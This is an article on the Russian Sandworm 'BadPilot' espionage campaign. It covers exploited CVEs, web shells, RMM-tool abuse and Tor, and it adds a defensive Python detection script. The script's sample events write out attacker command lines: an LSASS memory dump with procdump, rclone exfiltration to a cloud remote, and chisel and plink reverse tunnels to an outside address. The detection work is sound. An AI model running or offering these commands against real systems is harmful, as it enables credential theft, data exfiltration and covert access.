A subgroup of the notorious Russian state-sponsored hacking group Sandworm, also known as 'Seashell Blizzard' or 'APT44', has been conducting a sophisticated, multi-year cyber-espionage campaign named 'BadPilot', targeting a wide range of critical organizations and governments around the world.
According to a new report from Microsoft's Threat Intelligence team, the group has been active since at least 2021 and is responsible for breaching the networks of high-value sectors, including energy, oil and gas, telecommunications, shipping, arms manufacturing, and government agencies.
Sandworm, an advanced persistent threat (APT) group attributed to Russia's military intelligence agency, the Main Directorate of the General Staff of the Armed Forces (GRU), has a long record of espionage and disruptive operations on a global scale. The subgroup behind 'BadPilot' plays the initial-access role: it pursues access to sensitive networks, maintains a long-term presence there, and then hands that access to other Sandworm subgroups with more specialized post-compromise skills to execute high-value objectives.
The 'BadPilot' campaign consists of a series of targeted intrusions that exploit vulnerabilities in widely used IT infrastructure software. The attackers have exploited flaws in remote-management and endpoint-management products, including an authentication bypass in ConnectWise ScreenConnect (CVE-2024-1709) and a SQL injection in Fortinet FortiClient EMS (CVE-2023-48788), to expand their foothold in critical sectors in the United States, the United Kingdom, Ukraine, Europe, and Central and South Asia.
“Microsoft Threat Intelligence assesses that while some of the subgroup’s targeting is opportunistic, its compromises cumulatively offer Seashell Blizzard options when responding to Russia’s evolving strategic objectives. Since April 2022, Russia-aligned threat actors have increasingly targeted international organizations that are either geopolitically significant or provide military and/or political support to Ukraine,” the threat intelligence team noted in a blog post, adding that the subgroup has likely enabled at least three destructive cyberattacks in Ukraine since 2023.
Starting in 2024, the Sandworm subgroup used these vulnerabilities to compromise internet-facing systems across many sectors. By identifying exposed targets with third-party internet scanning services and drawing on publicly available knowledge repositories, Seashell Blizzard was able to find and breach vulnerable networks at scale.
In addition to exploiting older vulnerabilities in Microsoft Exchange (CVE-2021-34473, part of the ProxyShell chain) and Zimbra Collaboration (CVE-2022-41352), the threat actor deployed custom web shells such as 'LocalOlive' to establish long-term persistence on affected systems. These web shells gave the group a durable foothold in compromised networks from which to carry out further exploitation.
By 2024, the 'BadPilot' subgroup had also begun using legitimate IT remote management tools such as Atera Agent and Splashtop Remote Services to execute commands on compromised systems. Because these are signed, commercially supported products, the activity blends in with ordinary IT administration and rarely triggers traditional security monitoring.
The group has also adopted less common techniques for data exfiltration and command-and-control (C2). One of the most notable is routing the actor's inbound connections to compromised systems over the Tor network, which hides the attacker's own infrastructure from defenders watching for connections to known-bad addresses.
Further analysis shows the threat actor using Procdump to dump credentials from memory, Rclone to exfiltrate data, and Chisel and Plink to build covert network tunnels. Together these tools let the attackers move laterally across compromised networks and exfiltrate large volumes of data without detection.
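The post-compromise tooling described above (Procdump against LSASS, Rclone exfiltration, Chisel and Plink reverse tunnels, unsanctioned RMM agents, a Tor client on a server) is where defenders have the most to work with. As an added example, not code from Microsoft's report or from this article, the following Python runs the kind of process-creation rules a SOC would write for that tradecraft over constructed sample events. The sample events, the `APPROVED_RMM_HOSTS` allowlist and the agent process names (`AteraAgent.exe`, `SRService.exe`, `SRManager.exe`) are assumptions to be checked against your own telemetry and software inventory.

```python
import re

# Constructed sample process-creation events (not real telemetry) in the shape of the
# fields a SIEM exposes from Sysmon Event ID 1 / Windows Security 4688.
SAMPLE_EVENTS = [
    {"host": "srv-01", "image": r"C:\Windows\System32\svchost.exe",
     "cmdline": "svchost.exe -k netsvcs"},
    {"host": "srv-01", "image": r"C:\Users\Public\procdump64.exe",
     "cmdline": r"procdump64.exe -accepteula -ma lsass.exe C:\Users\Public\l.dmp"},
    {"host": "srv-02", "image": r"C:\ProgramData\rclone.exe",
     "cmdline": r"rclone.exe copy D:\Shares\Finance mega:backup --transfers 8"},
    {"host": "srv-02", "image": r"C:\ProgramData\chisel.exe",
     "cmdline": "chisel.exe client 203.0.113.10:8080 R:0.0.0.0:3389:127.0.0.1:3389"},
    {"host": "srv-03", "image": r"C:\Temp\plink.exe",
     "cmdline": "plink.exe -N -R 8443:127.0.0.1:443 user@203.0.113.10 -pw x"},
    {"host": "srv-03", "image": r"C:\Program Files\ATERA Networks\AteraAgent\AteraAgent.exe",
     "cmdline": "AteraAgent.exe"},
    {"host": "srv-04", "image": r"C:\Temp\tor\tor.exe",
     "cmdline": r"tor.exe -f C:\Temp\tor\torrc"},
]

# Assumption: hosts where RMM agents are sanctioned. An agent anywhere else is a finding.
APPROVED_RMM_HOSTS = {"it-jump-01"}

# Assumed process names for the Atera and Splashtop agents; verify against your inventory.
RMM_IMAGES = {"ateraagent.exe", "srservice.exe", "srmanager.exe"}


def image_name(path: str) -> str:
    """Return the lower-cased file name of an image path (Windows or POSIX separators)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def match_rules(event: dict) -> list[str]:
    """Return the names of every rule the event matches (possibly none)."""
    name = image_name(event["image"])
    cmd = event["cmdline"].lower()
    hits = []

    # Procdump taking a full memory dump of LSASS. A dump by PID ("-ma 652") evades this
    # string match, so pair it in production with a Sysmon Event 10 rule on lsass access.
    if name in {"procdump.exe", "procdump64.exe"} and "-ma" in cmd and "lsass" in cmd:
        hits.append("lsass_dump_procdump")

    # rclone copying/syncing to a named remote ("mega:", "s3:", ...). The remote name must
    # be 2+ characters so a local drive letter such as "D:" is not a false positive.
    if name == "rclone.exe" and re.search(r"\b(copy|sync|move)\b", cmd) \
            and re.search(r"\s[\w-]{2,}:", cmd):
        hits.append("rclone_exfil")

    # chisel in client mode with an "R:" remote, i.e. a reverse tunnel back into the host.
    if name == "chisel.exe" and "client" in cmd and re.search(r"\br:", cmd):
        hits.append("chisel_reverse_tunnel")

    # plink with -R: an SSH reverse port forward exposing an internal service outbound.
    if name == "plink.exe" and re.search(r"(^|\s)-r\s", cmd):
        hits.append("plink_reverse_tunnel")

    # A legitimate RMM agent running on a host that is not approved for it.
    if name in RMM_IMAGES and event["host"] not in APPROVED_RMM_HOSTS:
        hits.append("rmm_agent_unapproved")

    # A Tor client on a server is rarely legitimate; triage by reading its torrc.
    if name == "tor.exe":
        hits.append("tor_client_running")

    return hits


def detect(events: list[dict]) -> list[dict]:
    """Run every rule over every event and return one finding per (event, rule) match."""
    findings = []
    for ev in events:
        for rule in match_rules(ev):
            findings.append({"host": ev["host"], "rule": rule, "cmdline": ev["cmdline"]})
    return findings


if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f"{f['host']:8} {f['rule']:24} {f['cmdline']}")
```

The rules key on the image name and command line only, which is deliberately cheap but also easy to evade by renaming a binary; in a real deployment the same logic should be run against file hashes or signer information as well, and the LSASS rule should be backed by a process-access (Sysmon Event 10) rule that does not depend on how the attacker names the target.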
Earlier this week, EclecticIQ researchers warned that Sandworm has ramped up its attacks on Ukrainian systems with a malware campaign that lures Windows users in Ukraine with pirated software: trojanized Microsoft Key Management Service (KMS) activators and fake Windows updates.